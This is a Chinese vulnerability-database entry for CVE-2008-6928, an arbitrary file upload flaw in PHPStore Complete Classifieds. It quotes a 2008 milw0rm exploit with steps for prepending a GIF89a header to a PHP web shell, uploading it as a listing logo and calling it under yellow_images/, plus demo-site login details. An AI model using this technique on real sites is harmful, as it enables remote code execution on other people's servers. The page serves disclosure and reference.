phpstore complete_classifieds 任意文件上传漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116708 漏洞类型 权限许可和访问控制
发布时间 2008-11-10 更新时间 2009-08-12
CVE编号 CVE-2008-6928 CNNVD-ID CNNVD-200908-083
漏洞平台 PHP CVSS评分 6.5
|漏洞来源
https://www.exploit-db.com/exploits/7084
https://cxsecurity.com/issue/WLB-2009080022
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200908-083
|漏洞详情
PHPStoreCompleteClassifieds中的任意文件上传漏洞。远程认证用户通过上传一个具有例如logo那样的可执行扩展名的一个文件并向classifieds1/yellow_images/的文件提交一个直接请求来访问该文件,以执行任意代码。
|漏洞EXP
PHPStore Complete Customizable Classifieds Remote File Upload

Author: ZoRLu  msn: trt-turk@hotmail.com

home: www.z0rlu.blogspot.com

N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (

-----------------------------------------


exploit:


first register to site 

you add this code your shell to head 

GIF89a; 

example your_shell.php:

GIF89a;
<?

...

...

...

?>

and save your_sheell.php

login to site and Add Listing click open the new page upload logo (upload your_shell.php)

your_shell.php path:

localhost/script/yellow_images/[ID]_logo_your_shell.php

---------------------------------------------

example for demo:

login: http://www.phpstore.info/demos/cars/login.php

user: zorlu

passwd: zorlu1

shell: ( not permission for demo server )

http://www.phpstore.info/demos/classifieds1/yellow_images/1226242317_logo_c.php 


http://www.phpstore.info/demos/classifieds1/yellow_images/ ( you look here and see shell 1226242317_logo_c.php )

------------------------------------------------

thanks: str0ke & yildirimordulari.org  &  darkc0de.com

# milw0rm.com [2008-11-10]
|参考资料

来源:VUPEN
名称:ADV-2008-3100
链接:http://www.vupen.com/english/advisories/2008/3100
来源:MILW0RM
名称:7084
链接:http://www.milw0rm.com/exploits/7084
来源:SECUNIA
名称:32626
链接:http://secunia.com/advisories/32626
来源:OSVDB
名称:50294
链接:http://osvdb.org/50294